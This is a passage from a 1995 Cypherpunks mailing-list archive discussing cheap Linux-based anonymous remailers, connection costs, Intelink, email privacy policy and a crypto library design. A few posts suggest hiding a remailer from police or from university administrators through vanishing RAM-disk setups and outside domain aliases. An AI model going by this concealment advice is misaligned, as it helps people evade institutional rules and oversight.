monitor, keyboard, floppy, or video card. (a) would require some "umbilical cord" connection to initially set up from another PC. (b) need to operate on "umbilical", direct and uucp modes. I am just thinking out loud here, but the hardware could be damn cheap (sub $500). You can find old 386 boards with 4mb right on the board (no SIMMs) for next to nothing (the decreasing popularity of 30-pin SIMMs makes this a surplus store reality, as nobody wants to bother to strip out the RAM chips anymore). I have also seen an ad by the KILA company in Boulder, CO who advertise some sort of compact pc-on-a-card deal, that might be applicable. Comments? ------------------------------------------------------------------- P M Dierking | From rsalz at osf.org Thu Jan 19 11:30:17 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 19 Jan 95 11:30:17 PST Subject: Cone of silence update Message-ID: <9501191925.AA27121@sulphur.osf.org> ---------- Begin Forwarded Message ---------- Date: Wed, 18 Jan 95 21:03:02 -0500 From: burton at het.brown.edu (Joshua W. Burton) To: silent-tristero at world.std.com Subject: Cone of silence update I haven't been able to turn up the original New York Times article I saw, but our own Providence (RI) Journal today reprinted an article from the Washington Post, no date given, that tells substantially the same story, though without any mention of the cost of Intelink. Since a few people have asked me for details, I thought I'd better post this verbatim. Be sure to save a copy, in case this article disappears the way the first one I saw did.... GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE WASHINGTON - When the US intelligence community recently decided to modernize the way it communicates, it did what countless other government agencies, businesses and individuals have done over the last few years: it turned to the Internet. But the regular Internet wouldn't do. For spies and other government officials concerned about secrecy, that very public, very uncontrollable global mesh of computer networks was too risky a place to do business. So the intelligence community created its own Internet. Dubbed Intelink and based on the same technology used to run and navigate the original Internet, this new network for sharing supersecret information---including satellite imagery and video footage---officially began operating just a few weeks ago. When the bugs are worked out and a final system is in place, it will allow analysts, policy-makers, military officials and soldiers in the field to tap quickly and directly into classified information at the Central Intelligence Agency, the National Security Agency, the Pentagon and diverse other parts of the national security bureaucracy. Those familiar with Intelink say it could promote cooperation in a business characterized by internecine rivalry, and that at the very least it will centralize and speed up information retrieval. ``This is a major breakthrough,'' said Barry Horton, principal deputy assistant secretary of defense for command, control, communications and intelligence. ``Intelink for the first time, in a user-friendly environment, allows every element of the intelligence community and every element of the Department of Defense to reach into every other element,'' he said. As one might imagine, it's not for everybody. Horton said the system is now available only to people with ``Top Secret'' or higher security clearances. Moreover, those who run the system eventually will have to confront a major issue of how to make Intelink flexible enough to accommodate users with a variety of clearances. There are many levels of classification higher than Top Secret, and for Intelink to be useful to those working on the most secret programs, the officials responsible would have to be comfortable placing such information on the system. And, while Pentagon and CIA officials spoke of how Intelink promises to improve communication and cooperation among the agencies and reduce duplication of effort, others said there is good reason to be skeptical. The intelligence community has made innumerable attempts to eliminate redundancy and streamline information channels, but there has been little progress. ``It's gone like gangbusters since its inception, but any Internet-like thing grows overnight. The question is, is it going to mature well? And how will it operate in a time of crisis?'' said Ross Stapleton-Gray, who recently left the CIA to start a business providing Internet services to embassies in Washington. In a way it is fitting that what some call an Internet ``clone'' should come out of the national security bureaucracy. Internet itself was started under Department of Defense sponsorship in the 1960s, as an attack-proof communications link among military, corporate and university research centers. ``Remember, Internet is a DoD creation,'' said Neil Munro, a reporter for Washington_Technology, a local business newspaper, who recently broke the story about Intelink's start-up. ``This is the prodigal son....They created it and now it comes back in much stronger fashion.'' All those familiar with the system said it is totally walled off from the Internet, and designed never to be penetrated. But several experts familiar with Intelink noted that no system is ever totally secure. ``This would obviously be a Mount Everest for hackers,'' said John E. Pike of the Federation of American Scientists. But Pike, who said he thinks Intelink has the potential to ``revolutionize'' the intelligence community, added that it would be so difficult to crack he doubts many will try. The network now operates among several dozen intelligence agencies and centers. But it is the talk of the intelligence community, and its reach is expected to grow rapidly. Those who now have regular access to it number in the hundreds, estimated Martin C. Faga, general manager of the Center for Integrated Intelligence Systems at the Mitre Corp., the company that helped the intelligence agencies set up the system. ----------- End Forwarded Message ----------- From tcmay at netcom.com Thu Jan 19 11:51:40 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 11:51:40 PST Subject: "Time" Magazine and "Future Shock" Author Message-ID: <199501191940.LAA09311@netcom15.netcom.com> [I'm into my daily "blackout" of toad mail to Netcom, so am posting blind, as usual. If this article has already been posted, my condolences.] The January 23rd issue of "Time," this week's issue, features a cover story on talk shows, Limbaugh, Gingrich, and "HyperDemocracy." I haven't seen the physical issue yet, but have skimmed the Web version at: http://www.timeinc.com/time/magazine/magazine.html Point your browser at it and have fun. Lots of folks are flaming the article, in the usual newsgroups (e.g., alt.data-highway). Me, I'm as scared as "Time" is about "direct, electronic democracy," though perhaps for different reasons. On a related note, the article and sidebars touch heavily on the "cybergurus" who are advising Newt Gingrich on his journey into cyberscpace, notably Alvin Toffler ("Future Shock," "The Third Wave," "Powershift," etc.) and George Gilder ("Beyond Wealth and Poverty," "Macrocosm," lots of essays on the Net). As it happens, I spent some time talking to Alvin and Heidi Toffler at an interview last Friday in L.A.--they were being interviewed before and after me. Not enough time to really get into issues, and of course they did most of the talking (Heidi is especially opinionated, and had just been in a highly publicized battle with newage guru Arianne Huffington, spacey wife of losing candiate in California, Michael H.). Anyway, we talked about John Brunner (as you all know, Brunner's seminal "The Shockwave Rider," was inspired by "Future Shock") and his ideas. (And we all agreed that "Stand on Zanzibar" was his crowning achievement...even Shalmaneser admitted "Christ, what an imagination he's got.") Tidbits: * on digital cash: Heidi: "Oh, we're for it! Did you hear what I just told the interviewer?" (I didn't, as I was in the adjacent room. Later comments lead me to believe that neither of the Tofflers has a clear idea of what's going to happen with digital cash and crypto anarchy.) * on the NSA and the t-shirt I showed them ("Cypherpunks: putting the NSA out of business"): "Oh, no, we need a strong NSA now more than ever!" (What else would I expect? They view the NSA as the main bastion against terrorists plotting to blow up the World Trade Center. Alvin was generally more reserved and thoughtful. When I pointed out that the very hotel room we were in could be used to plot crimes, even nuclear terrorism, and that the solution to stop this would have to be an Orwellian regime of continuous monitoring, Alvin nodded thoughtfully, but Heidi just sniffed. I mention this to give a flavor, just a whiff, of what senior advisors to the most influential man in America are thinking.) * I gave Alvin a copy of my "Crypto Anarchy and Virtual Communities" paper. * My interview was pretty disappointing, by the way. Lots of sitting around, delays in getting my laptop hooked up to Netcom (outside calls had to be unblocked). The interviewer wanted memorable, quotable stuff from me, but I felt constricted sitting around and being expected to spout on cue. Maybe they'll get a few minutes of usable stuff.... (Print media is so much better. An interviewer can let the tape recorder run for hours, can edit the containing material of a quote, and can thus produce clear, coherent quotes. A video interview is more constrained in lots of ways, and offending gestures or rambling interjections cannot be easily edited out. As one example, at one point I naturally (to me at least) said something about "As we just saw...." Well, this made this quote unusable. And so it goes.) I was generally unhappy with the whole thing. Four hours to get there, two hours spend waiting around, an hour to resolve problems, an hour under the camera lights (being told not to move, to "use the mouse," to "tell us why cryptography is important," etc.), and five hours to get home. All for a few minutes at most on a t.v. show. Oh, the show is the BBC's "Horizons" science series, which may also get sold to U.S. outlets, etc. I think the title will be "The Information Bomb," and features segments on information warfare, a la Winn Schwartau's views, the Tofflers, some military planners, and--maybe--me. I don't have high hopes for my segment. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From arthurc at crl.com Thu Jan 19 11:58:06 1995 From: arthurc at crl.com (Arthur Chandler) Date: Thu, 19 Jan 95 11:58:06 PST Subject: "Disclosing" private email Message-ID: Greetings! I'd like to solicit your/our best thoughts on the following message. San Francisco State University is considering a policy of "disclosing" private email to outside agencies. I'm aware that such a policy is yet another argument for using crypto; and the last cypherpunks meeting gave some encouraging instances of "transparent" encryption schemes that are not a hassle or a fear-barrier for newbies. But if you could post or private email me your thoughts about the legal/ethical aspects of "disclosure," I'd be much obliged. I've put a few of my own concerns at the end of the enclosed quote. ---------- Forwarded message ---------- >From: "Deirdre C. Donovan" > >I am rewriting the information handouts which we here in San Francisco >give out to our students when they apply for Internet access accounts. >The issue with which I am struggling is one of privacy. I have heard of >universities (anecdotally only) where the administration reserves the >right to read E-mail. Here, we are leaning more toward something like the >paragraph below, which is taken verbatim from an Indiana University draft >document. > > IU computing centers will maintain the confidentiality of all > information stored on their computing resources. Requests for > disclosure of confidential information will be reviewed by the > administrator of the computer system involved. Such requests > will be honored only when approved by University officials > authorized by the [President] of the campus involved, or when > required by state or federal law. Except when inappropriate, > computer users will receive prior notice of such disclosures. > I'm uneasy about the chain of "prior notice": 1) Does this policy give university administrators the power to read private email before the decision is made to "disclose" it to outside persons or agencies? 2) Does this "prior notice" mean "We're going to do it" or "We plan to do it, and if you disagree, let's discuss it before we release it"? 3) What constitutes "inappropriate"? From perry at imsi.com Thu Jan 19 12:04:37 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 19 Jan 95 12:04:37 PST Subject: UUNET Customer Liaison: USENET "netiquette" Reminder Message-ID: <9501192004.AA04647@snark.imsi.com> It would appear that UUNET does not consider themselves to be a common carrier any more -- they now claim the right to cut sites off for violating netiquette. .pm ------- Forwarded Message From: help at uunet.uu.net (UUNET Customer Liaison) Message-Id: Subject: USENET "netiquette" Reminder To: news-subscribers at uunet.uu.net Date: Thu, 19 Jan 1995 13:26:40 -0500 (EST) Because of recent improper use by users on AlterNet sites we are sending out this reminder to all sites currently subscribing to news. If you have not reviewed the accepted USENET netiquette with your users recently we strongly suggest you take this opportunity to do so. Before you or your users post to USENET, please take the time to learn the rules of the environment which you are entering. Doing so can make the difference between creating a good name for you and your company on the Internet or a bad one. Please read the postings contained in news.announce.newusers to familiarize yourself with the etiquette of USENET. This information may also be obtained via anonymous FTP at UUNET's archive (ftp.uu.net) in the directory /usenet/news.answers/news-newusers-intro.Z UUCP customers may obtain the file via UUCP. It is your responsibility to ensure that the users on your system are also aware of the proper guidelines for posting to USENET. Improper use of "netiquette", the guidelines of the USENET community, will be viewed as a violation of the rules of a network. This is in violation of your contract with UUNET/AlterNet and will likely result in your a loss of news posting privileges for your site. Tamara Bowman help at uunet.uu.net Manager Technical Support uunet!help UUNET Technologies, Inc. ------- End of Forwarded Message From tcmay at netcom.com Thu Jan 19 12:20:45 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 12:20:45 PST Subject: The Remailer Crisis In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com> Message-ID: <199501191958.LAA13462@netcom15.netcom.com> > Jeff's response is exactly what I was hoping for! The "Cypherpunks > distribution" version of Linux would be a great way to spread cheap > remailer technology on cheap Linux boxes. Hell, I might even augment > my Macs with one of these things! One thing I should've noted is that a Linux-based cheap remailer is mostly useless without a "live connection" to the Net. That's why I mentioned hanging these directly off The Little Garden's net (i.e., putting the box in the same building as the physical net, to avoid expensive connections). What are the cheapest "live connections" (24-hour a day connections) available? Where I am, about $100 a month, plus whatever the local phone company charges for a dedicated line. ISDN is an option, but it looks to cost $400-800 to get started, plus a monthly charge (which I don't recall, except that I "gulped" when I heard it). So, even an el cheapo 486-based Linux box, for perhaps $800 or so, would need to solve the problem of a cheap, continuous connection to the Net. (My supposition is that one approach is to share these connections, hence my notion of hanging machines on other people's nets.) At $100-200 per month for connect charges, I don't expect a "cheap Linux distribution" will cause many people to set up remailers. What have I overlooked? Are there options for several machines to share a connection? (I'm sure there are....). Someone who already has a connection may be willing to host additional machines, which could share some of the charges. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From perry at imsi.com Thu Jan 19 12:31:09 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 19 Jan 95 12:31:09 PST Subject: The Remailer Crisis In-Reply-To: <199501191958.LAA13462@netcom15.netcom.com> Message-ID: <9501192029.AA04709@snark.imsi.com> Timothy C. May says: > What are the cheapest "live connections" (24-hour a day connections) > available? Where I am, about $100 a month, plus whatever the local > phone company charges for a dedicated line. In NYC, you can get a permanent dial up slip account for $75 per month -- no dedicated line charges because there is no dedicated line per se. Phone charges will add an additional $12 per month. Perry From rsalz at osf.org Thu Jan 19 12:47:08 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 19 Jan 95 12:47:08 PST Subject: UUNET Customer Liaison: USENET "netiquette" Reminder Message-ID: <9501192040.AA27218@sulphur.osf.org> > It would appear that UUNET does not consider themselves to be a common > carrier any more -- they now claim the right to cut sites off for > violating netiquette. Strange. First, they were never a common carrier: they went to some legal pains to get registered as an enhanced service provider. I don't know what the differences are, but when the first "Internet Porn" article by Joe Abernathy appeared years ago, Rick wasn't worried. He told me ESP was better then CC, but I don't remember why (perhaps it was no FCC regulation?) It's unclear how this new policy affects their ESP status. /r$ From zoo at armadillo.com Thu Jan 19 12:58:27 1995 From: zoo at armadillo.com (david d `zoo' zuhn) Date: Thu, 19 Jan 95 12:58:27 PST Subject: The Remailer Crisis Message-ID: <199501192056.OAA24035@monad.armadillo.com> // Are there options for several machines to share a connection? (I'm // sure there are....). Someone who already has a connection may be // willing to host additional machines, which could share some of the // charges. Around here (in the Twin Cities) one can get a dedicated connection for $100/month without any startup fees. And of course one can set up a local network and use the machine with the modem link as a router. Having one of these dedicated lines, I'd be happy to host remailer-boxes at my site. Ideally, they'll be small & only require a network cable and a power cord. I'm also willing to seriously consider initiating remailer-accounts on my machine. If you'd be interested in a remailer account, drop me a line. -- - david d `zoo' zuhn -| armadillo zoo software -- St. Paul, Minnesota -- zoo at armadillo.com --| unix generalist (and occasional specialist) ------------------------+ http://www.armadillo.com/ for more information pgp key upon request +---------------------------------------------------- From jalicqui at prairienet.org Thu Jan 19 13:05:11 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Thu, 19 Jan 95 13:05:11 PST Subject: Remailer-on-a-CD Message-ID: <9501192105.AA29392@firefly.prairienet.org> >>The "Linux mavens" followed by the "black box" stuff sparked an idea... > >>package. To make it as easy as possible, I'd use the UMSDOS filesystem so >>that Linux could be installed on a DOS machine without any reformatting >>repartitioning, or similar headaches. > >>distribution already has) and some boot options, you'd have an "instant >>remailer" software package, able to transform any 386SX/4MB RAM DOS macine >>or better into a Linux-based remailer site, complete with aliases, loggng > >>So, am I dreaming, or does this sound viable to y'all? > >OK, let's ponder the minimum hardware necessary, >possible minimal configuration (Intel/clone based): > >(1) Case. >(2) Power supply. >(3) Motherboard/CPU and 4mb RAM. >(4) Hard drive w/ controller. >(5) modem card. Add "standard serial port" here, for reasons I'll get into in a moment... >(5) No monitor, keyboard, floppy, or video card. > (a) would require some "umbilical cord" connection to initially > set up from another PC. > (b) need to operate on "umbilical", direct and uucp modes. The "umbilical cord" here could be a standard serial port; this could be used in several ways. In addition, Linux has the ability to do TCP/IP through the parallel ports (using a LapLink-style protocol), so that could possibly work as well. There are a few options here: Reuse the monitor, keyboard, etc. for each installation. Go ahead and throw in the floppy, and set up the Linux kernel on the floppy to use the serial port as the console instead of the monitor/keyboard. Connect your second PC using the PLIP (that's the parallel port IP stuff) protocol. On the second PC, one would run a program that wouls telnet to the first PC and run the install program, which would run via NFS on the PLIP line. >I am just thinking out loud here, but the hardware could be damn >cheap (sub $500). You can find old 386 boards with 4mb right on >the board (no SIMMs) for next to nothing (the decreasing popularity >of 30-pin SIMMs makes this a surplus store reality, as nobody >wants to bother to strip out the RAM chips anymore). As far as price, I've seen 386SX motherboards run for $99. At a going rate of $50 per MB of RAM, buying a used MFM disk and controller for, say, $40 (I had the option of buying a junk box full of stuff, including two 20MB drives and a 10MB, for $100), some cheap $10 everything-board, a $70 14.4 modem, and a power supply at $50 (here I may be way off), that adds up to... $470. Not a bad guess! And this assumes you pay new prices for the motherboard, RAM, multiport, modem, and power supply... Also, if you wanted to splurge, you could opt for a few more MB of RAM and a CD-ROM drive. With our recently pressed "Cypherpunk Toolkit" CD-ROMs :-) and a boot floppy, you wouldn't necessarily need to install anything at all; the Linux kernel could store site-specific info (entered the first time you booted up via a cute user-friendly interface) on the floppy and load it to a RAMdisk, mounting the CD-ROM for all the rest of the interesting stuff. On multipurpose systems (you only use the computer a few hours per day and run the remailer using some store-and-forward system the rest of the time), this wouldn't take up any hard disk space, and your remailer could conveniently disappear with a simple Ctrl-Alt-Del and the slam of a safe door. ("But officer, all I have on my hard drive is DOS and Windows. See for yourself! I don't even have PGP here...") You know, the more I think about this, the more ideas pop into my head. I'd better quit before I get dizzy... What if the site-specific stuff on the floppy were encrypted... or the kernel... ? Could we use Matt Blaze's CFS...? Store the site-specifics on a data haven for backup... with auto-download on bootup... notebook remailers in car trunks using RadioMail or POP3 that have no single physical location... dynamic remailer configuration (download your IP address and alias info, etc. from the Remailer Server)...? STOP THE WORLD, I WANT TO GET OFF!!! There; that's better. Maybe I'll play around this weekend and try building a minimal Linux distribution (on what hard disk space :-). Then again, maybe I won't, so don't be bashful to play around on your own! From jml at wizard.synapse.net Thu Jan 19 13:20:22 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Thu, 19 Jan 95 13:20:22 PST Subject: Internet World Magazine Message-ID: <199501192119.QAA21262@sentinel.synapse.net> This month's issue of Internet World Magazine deals primarily with internet security. I'm am not going to review everything in the mag but I'll list the table of content: Better Safe: Danger lurks on the Info Highway. You must take precaution to reduce your riks. By Dave Taylor and Rosalind Resnick Getting Cryptic: Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it. By William Stalling. (Introductory article about PGP. Nothing we, here, don't already know) Securing the Enterprise: Connectiong your corporation to the Internet can be a security nightmare. Firewalls are the main line of defense. By Alton Hoover (An overview of Firewalls, application-layer gateways and token-based authentication schemes) Beyond the Firewall: The latest firewall technology not only detects intruders, but strikes back. By Winn Schwartau (Very interesting article. Here are some quotes to wet your appetite: Wouldn't it be nice if a computer system attacked from the Internet responded to the attack by striking back at the intruder? This is exactly what Sidewinder's implementation of type enforcement does.....It will detect the intrusion immediately....As soon as a violation occurs, a silent alarm is activated....sidewinder can be configured to react in any number of ways, once an attack has been detected...it can shut the intruder cold...(or)...it can invoke a mechanism that would record all the information from whence came the attack....By luring the attacker into a false sense of security, the hacker would continue trying to break in, unaware that every step was being recorded... Cashing In: As Internet commerce expands, a host of companies are vying to establish their system as the basis for cyberbanking and credit-card transactions. By Lisa Morgan Business Browser: New versions of Mosaic with built-in encryption promise to keep your transactions safe. By Richard W. Wiggins Unlawful Entry Crackers can feasts on your data if you fail to plug your leaky Unix system By Aaron Weiss (Five Ways to crack a Unix System) It's Alive: Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on. By Steven Vaughan-Nichols Building Trust The chief executives of Trusted Information Systems -Steve Crocker and Steve Walker- talk about encryption, CyberCash, Clipper, and more. By Jeff Ubois. All in all a rather interesting mag. Check it out. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ wizard at alpha.c2.org Give me the liberty to know, to utter, and to argue freely according to conscience, above all liberties. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From frissell at panix.com Thu Jan 19 13:25:48 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Jan 95 13:25:48 PST Subject: The Remailer Crisis Message-ID: <199501192123.AA29095@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 01:14 AM 1/19/95 -0800, Timothy C. May wrote: >* I favor separating the "account that remails" from the "owner of the >site," as I have argued in vain in the past. (Example: a willing site >gives out or sells many accounts...each is legally separate, and each >must be legally challenged. My longer posts dealt with this.) I offer to pay for and operate a remailer account on any system that will have me. Do we have the software yet to run a remailer out of an account? >It's time to get cracking on this crisis. The Cable companies may come to our rescue. Even old fuddy-duddy Cablevision is going to be offering connections this year. If those connections are characterised merely as physical connections, that could offer legal protections. My contrib for now will be to draft an all purpose response letter to respond to civilian and official complaints concerning remailer abuse. DCF - -- You know, Private Idaho brings PGP signing within about 10 keystrokes in any Windows mailer. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx6vUYVO4r4sgSPhAQFjzgP/ZVAonNBsZpMCg/tlWohvC7ratGTZWtCz /WXC+Z1PAKhigdz8VhWhkPXLj/jYba1LUMBI9giNP6T9TSxMw6jjzgvs44tw4LF4 X0pF/lv9OS7GKcPw//4FyB1FKgfwpJA+mHr8gqlLrxREXv3qpHfKRuu/ecg5urmS jwiSSKsjZhU= =Aoq4 -----END PGP SIGNATURE----- From jcorgan at scruznet.com Thu Jan 19 13:29:29 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Thu, 19 Jan 95 13:29:29 PST Subject: The Remailer Crisis Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >What are the cheapest "live connections" (24-hour a day connections) >available? Where I am, about $100 a month, plus whatever the local >phone company charges for a dedicated line. ISDN is an option, but it >looks to cost $400-800 to get started, plus a monthly charge (which I >don't recall, except that I "gulped" when I heard it). I am currently using ISDN from my home in San Jose. You're right in that the startup costs are the barrier--even a cheap single B channel (56K) terminal adapter for use with a serial port will run $300-$400 dollars. The telco charges are minimal in my area; $25 monthly for the line itself (115 Kbps async bandwidth). Connect charges are free for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) Mon-Fri. This is the Pacific Bell "Residential" ISDN plan. For business lines, it goes up to $50 monthly with $0.60/hour 24 hours a day. In addition to this would apply any standard long distance charges that would apply to a particular call. This is an excellent setup for fast, cheap, INTERMITTENT connection to the Internet. My particular ISP is in Santa Cruz, with POPS in SC, SJ, and soon Monterey. An unlimited connect time PPP account runs $75 monthly. This actually gets me a three bit subnet so that I can put five IP boxes and an ISDN router on my ethernet at home. A remailer in this scenario would need to have their MX record point to their ISP, and process mail via POP (incoming) and SMTP (outgoing). It would be straightforward to implement a timed or demand dial scenario (say, every fifteen minutes) to accomplish this. While not the ideal (continuous internet connection with pure SMTP based mail transport), it would suffice for a moderately loaded remailer, I'd imagine. Of course, this involves the mail subsystem of your ISP, partially defeating the purpose of having ubiquitous anonymous remailer "instances" whose operation is outside the control of an ISP. Still, it would be a good start. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLx7Y2E1Diok8GKihAQExmwP8DmWuHMunZoaA4Y8qh7jx56hqgs4p3Bgo DgHf2J4FoPwzVzXwSH0ep+1tKkHWNnDTXB7UVtuZjLF4uE4HtY72d0ANEfZ0AgPw 9peOBzZoukxpl6nMmHszUBWXxfP4DJW9AvbPdzOWFE1OAMIQLi6mpEyGE3Vouv61 WX+4gzx+4M0= =iP7S -----END PGP SIGNATURE----- From jalicqui at prairienet.org Thu Jan 19 13:52:28 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Thu, 19 Jan 95 13:52:28 PST Subject: The Remailer Crisis Message-ID: <9501192150.AA14796@firefly.prairienet.org> > >> Jeff's response is exactly what I was hoping for! The "Cypherpunks >> distribution" version of Linux would be a great way to spread cheap >> remailer technology on cheap Linux boxes. Hell, I might even augment >> my Macs with one of these things! > >One thing I should've noted is that a Linux-based cheap remailer is >mostly useless without a "live connection" to the Net. That's why I >mentioned hanging these directly off The Little Garden's net (i.e., >putting the box in the same building as the physical net, to avoid >expensive connections). Not necessarily. Imagine, for example, a FidoNet or UUCP remailer. It might be nice for Internet users to have some kind of mail aliasing in the DNS for you, but it wouldn't be required by any means. I think it would be better to have lots of remailers with ugly addresses (like "jeff%jtj-l.uucp at cei.com", which is my address on my Linux box at home) than only a few with nice ones. (FidoNet has its own problems, such as paranoid BBSes that disallow encrypted traffic, but that's another matter.) These remailers wouldn't even need to be up 24 hours; you could run it at night, calling up on bootup and every hour thereafter or something. It's not perfect, to be sure, but what else is perfect? I don't know how hard it is to get in on the local FidoNet, but UUCP isn't too hard, and is a lot cheaper. When I was in college, my college gave me a feed for free. I'm not so familiar what providers charge. Of course, university accounts have their good and bad points; however, if you could persuade someone offsite with control over a domain name (for example, "remailer.net" :-) to give you a mail alias on their domain, this would take a bit more effort to track than your typical "remailer.uiuc.edu" type domain. This would make it less likely that the university would hear complaints, also, since most complainers would be more likely to complain to "postmaster at remailer.net" than "postmaster at uiuc.edu" if your machine was called "anon at anarchy.remailer.net" instead of "anon%anarchy.uucp at uiuc.edu" or "anon at anarchy.uiuc.edu". And this doesn't even get into the neato-cool new services you West Coasters get, like RadioMail... >What are the cheapest "live connections" (24-hour a day connections) >available? Where I am, about $100 a month, plus whatever the local >phone company charges for a dedicated line. ISDN is an option, but it >looks to cost $400-800 to get started, plus a monthly charge (which I >don't recall, except that I "gulped" when I heard it). Around here, it isn't even available unless you access through the CompuServe numbers or call long distance (read: $$$). That may be changing soon... >So, even an el cheapo 486-based Linux box, for perhaps $800 or so, >would need to solve the problem of a cheap, continuous connection to >the Net. (My supposition is that one approach is to share these >connections, hence my notion of hanging machines on other people's >nets.) No need for even a 486. If it takes an hour to process a remailer script, so much the better for the mix. You could call it a "required latency feature". :-) >Are there options for several machines to share a connection? (I'm >sure there are....). Someone who already has a connection may be >willing to host additional machines, which could share some of the >charges. Set up correctly, these "Remailer-In-A-Box" type machines could do several things to share a connection. They could, for example, all be connected with serial cables and use UUCP to get mail where it needs to go. I believe, in addition, that you can chain up to three deep with PLIP. This of course assumes that Ethernet isn't an option. From xpat at vm1.spcs.umn.edu Thu Jan 19 14:43:31 1995 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Thu, 19 Jan 95 14:43:31 PST Subject: AT&T IVES chip Message-ID: <9501192243.AA21298@toad.com> Interpretive Summary From PC Week: "Security Chip, interface aim to assist Electronic Commerce" AT&T IVES (Information Vending Encryption System) chip will encrypt data, video on demand, banking, etc. The IVES chip will be use in AT&T cable-TV-boxes this year. It is available to OEM's for Internet data security applications. IVES uses algorithms licensed from RSA. No mention of any dreaded built-in peephole. --------------------------------------------------------------------- P M Dierking | From jrochkin at cs.oberlin.edu Thu Jan 19 14:54:52 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 19 Jan 95 14:54:52 PST Subject: The Remailer Crisis Message-ID: At 4:49 PM 01/19/95, Jeff Licquia wrote: >persuade someone offsite with control over a domain name (for example, >"remailer.net" :-) to give you a mail alias on their domain, this would take >a bit more effort to track than your typical "remailer.uiuc.edu" type >domain. This would make it less likely that the university would hear >complaints, also, since most complainers would be more likely to complain to >"postmaster at remailer.net" than "postmaster at uiuc.edu" if your machine was >called "anon at anarchy.remailer.net" instead of "anon%anarchy.uucp at uiuc.edu" >or "anon at anarchy.uiuc.edu". I was thinking of this same thing. I'm hopefully going to have a unix box on the net in my college dorm room soon, but I'm a bit hesitant to run a remailer on it. I'm a bit scared to ask whether it would be allowed, on the "it's better to get forgiveness then permission" line of thought. But I'd rather avoid the potential of having to get forgiveness either. If my site had a "machine.remailer.net" address, there would be many benefits. For one, I don't have to worry about some administrator coming accross a list of anon remailers (in a Time magazine scare-tactic article, eek!), and noticing that one of them appears to be operating from some student's dorm room, and secondly, as Jeff says, people who complain are just going to complain to admin at remailer.net. They aren't going to take the time to try to figure out that my IP address is really in oberlin.edu, and complain to postmaster at oberlin.edu. So administration at oberlin would never even realize I was running a remailer, and since they haven't yet made any indication that that would be against the rules, I would be in a good position. Maybe it's time for Eric to figure out what he's going to do with remailer.net. From cactus at hks.net Thu Jan 19 15:01:58 1995 From: cactus at hks.net (Insomnia Gallumbits) Date: Thu, 19 Jan 95 15:01:58 PST Subject: Status of GUCAPI Message-ID: <199501192306.SAA16798@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I'm just about done with the first part of my crypto library, the internal generalized I/O, and largely done with the framework for the encoding rules. Since I haven't fully outlined what I'm doing here, I thought I'd mention the outline in the hopes of getting some real feedback and perhaps some random snipets of code. In essence, what I'm building is a crypto library that takes a very general approach with a few parameters controlling its behavior. The idea is to have something that anybody can drop into their mail agent and have an easy way of using crypto and interface with existing systems such as PGP. A major design goal is to be backwards compatable with PGP, but paramount is having a plug-and-play library that will be flexible enough to meet future crypto needs. One of the biggest problems today is that crypto libraries are chiselled out to deal with very specific cases -- the most general I know of if is RSAREF, which AFAIK only supports BER/DER for encoding and RSA and DES/CBC for encryption. I'll grow more clueful on that, and other crypto and key management issues, as I get to actually working on them. The things that I've parametrized in the design are: - Type of I/O. Right now, files (and fds) and a couple of memory configurations are supported. I've made it trivial to add new types of I/O as well, and there are flags to support to immediate zeroing of data once it is read into the internal structures. - Encoding of data. There are multiple ways to encode a bytestream and these methods can be nested. For example, PGP, MIME, and uuencode use their own formats. In this library, you can specify the type. I also want to eventually put logic in (where possible) to determine the type and will also use this to support various compression schemes. - Ciphers (this is the big one). Right now, as I've mentioned, things are very haphazard. What I want is a way to change one parameter from, for example, CRTYPE_IDEA to CRTYPE_DES and thus change the encryption scheme. - Key management. I know of two major ways of doing things right now, X.509/PEM certificates as pushed by RSADSI, and PGP web-of-trust. As far as I can tell, PEM-style certificates are just a degenerate case of PGP web-of-trust. - Random sources. People should be offered a pretty good source of random numbers, but should also be allowed to drop in their own sources. This is going to be relatively tough on platforms I don't know much about, IE Mac and PC, but I'm hoping for some help on this. I can also salvage some code from RIPEM for those. - Autoconfiguration to incoming messages. People should be able to open a file and have it work, even with schema added to the library after the original adaption to GUCAPI. There's some other stuff that I'm probably forgetting here, but that's the gist of it. The cipher code is going to be pretty simple: I'm getting a lot of code from various places on the net; the code exists, it just isn't put into a form that is easy to use. The most 